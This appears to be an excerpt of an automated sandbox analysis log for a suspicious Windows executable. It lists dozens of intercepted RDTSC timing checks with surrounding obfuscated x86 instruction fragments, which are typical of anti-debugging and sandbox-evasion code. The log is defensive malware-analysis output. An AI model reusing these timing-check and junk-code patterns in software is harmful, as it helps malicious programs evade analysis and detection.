Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A24C second address: B5A250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C30C second address: B5C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C310 second address: B5C32A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FC22CC1B8A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5CEA8 second address: B5CEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E4F9 second address: B5E515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E24D second address: B5E25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FC22D01ECC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E25C second address: B5E26A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E515 second address: B5E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC22D01ECC8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FC22D01ECC8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov si, 79B7h 0x00000048 mov edi, ecx 0x0000004a xchg eax, ebx 0x0000004b jng 00007FC22D01ECD5h 0x00000051 jmp 00007FC22D01ECCFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007FC22D01ECC6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5EDB3 second address: B5EDBD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5FA16 second address: B5FA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC22D01ECCCh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5FA32 second address: B5FA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6249C second address: B624AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B624AC second address: B624B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6029E second address: B602A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B629F0 second address: B629F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B63AF9 second address: B63AFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64A48 second address: B64A4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B63C8A second address: B63C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64A4E second address: B64AB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8B2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FC22CC1B8B8h 0x00000011 nop 0x00000012 movsx ebx, ax 0x00000015 push 00000000h 0x00000017 mov ebx, 1AE51155h 0x0000001c push 00000000h 0x0000001e call 00007FC22CC1B8B8h 0x00000023 mov dword ptr [ebp+12465916h], ebx 0x00000029 pop ebx 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64AB0 second address: B64AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64AB4 second address: B64ABE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64ABE second address: B64AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B65D02 second address: B65D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B65D07 second address: B65D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B67BD9 second address: B67BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D3F second address: B68D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D45 second address: B68D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D49 second address: B68DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2593h], esi 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D37FAh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FC22D01ECC8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov bx, 2D10h 0x00000039 xchg eax, esi 0x0000003a jmp 00007FC22D01ECD8h 0x0000003f push eax 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B69F03 second address: B69F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FAE second address: B68FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FB4 second address: B68FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FCB second address: B68FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FCF second address: B68FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF57 second address: B6AF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF5D second address: B6AF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF61 second address: B6AFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+122D2008h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e js 00007FC22D01ECC8h 0x00000034 mov bl, A4h 0x00000036 mov dword ptr [ebp+122D27BAh], eax 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FC22D01ECC8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AFCA second address: B6AFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6C105 second address: B6C176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC22D01ECC8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jnc 00007FC22D01ECD4h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC22D01ECC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 mov edi, 49C10FD6h 0x00000038 push 00000000h 0x0000003a call 00007FC22D01ECD5h 0x0000003f mov dword ptr [ebp+122D1F5Dh], edi 0x00000045 pop ebx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FC22D01ECC6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6C176 second address: B6C1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8A8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 js 00007FC22CC1B8D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC22CC1B8B4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6D12F second address: B6D17A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movsx edi, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC22D01ECC8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b add dword ptr [ebp+122DBBADh], esi 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 mov di, 1C52h 0x00000038 mov dx, di 0x0000003b popad 0x0000003c push eax 0x0000003d jnp 00007FC22D01ECD0h 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E1FA second address: B6E1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E1FE second address: B6E259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC22D01ECCFh 0x0000000e popad 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D295Bh], eax 0x00000016 push 00000000h 0x00000018 xor bx, CA00h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC22D01ECC8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 sub dword ptr [ebp+122DBB93h], ecx 0x0000003f xchg eax, esi 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 jng 00007FC22D01ECC6h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E407 second address: B6E429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8B1h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E429 second address: B6E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+124579F1h], edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 pushad 0x00000015 jmp 00007FC22D01ECD3h 0x0000001a jne 00007FC22D01ECCCh 0x00000020 popad 0x00000021 and bx, A100h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov dword ptr [ebp+122D25A2h], eax 0x00000033 mov eax, dword ptr [ebp+122D1245h] 0x00000039 sub dword ptr [ebp+122D38FCh], ecx 0x0000003f push FFFFFFFFh 0x00000041 jmp 00007FC22D01ECCCh 0x00000046 mov ebx, esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7039B second address: B703A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B703A5 second address: B70413 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2EBBh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC22D01ECC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov ebx, ecx 0x00000047 jp 00007FC22D01ECCBh 0x0000004d sub bx, F935h 0x00000052 mov eax, dword ptr [ebp+122D0009h] 0x00000058 mov dword ptr [ebp+122D2135h], edi 0x0000005e push FFFFFFFFh 0x00000060 add bx, 9145h 0x00000065 nop 0x00000066 pushad 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B70413 second address: B70435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FC22CC1B8A8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B721B7 second address: B721BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B16254 second address: B1625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1625A second address: B16282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007FC22D01ECDCh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC22D01ECD4h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7A6CA second address: B7A6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7A6D8 second address: B7A6DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D6DB second address: B7D726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007FC22CC1B8B3h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FC22CC1B8B2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC22CC1B8B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D726 second address: B7D72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D868 second address: B7D87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA5B second address: B7DA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22D01ECCCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA72 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA7C second address: B7DA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DBBE second address: B7DBC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DBC2 second address: B7DBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802B0 second address: B802B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802B4 second address: B802BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802BD second address: B802C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B11231 second address: B11242 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECCCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8369F second address: B836A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B836A5 second address: B836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B836A9 second address: B836DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 je 00007FC22CC1B8A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 jno 00007FC22CC1B8A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B83E7A second address: B83EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f jmp 00007FC22D01ECD9h 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B83FA5 second address: B84021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B8h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC22CC1B8B9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007FC22CC1B8ABh 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 jmp 00007FC22CC1B8B7h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FC22CC1B8ACh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87618 second address: B8762A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FC22D01ECCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8762A second address: B87643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87643 second address: B87650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
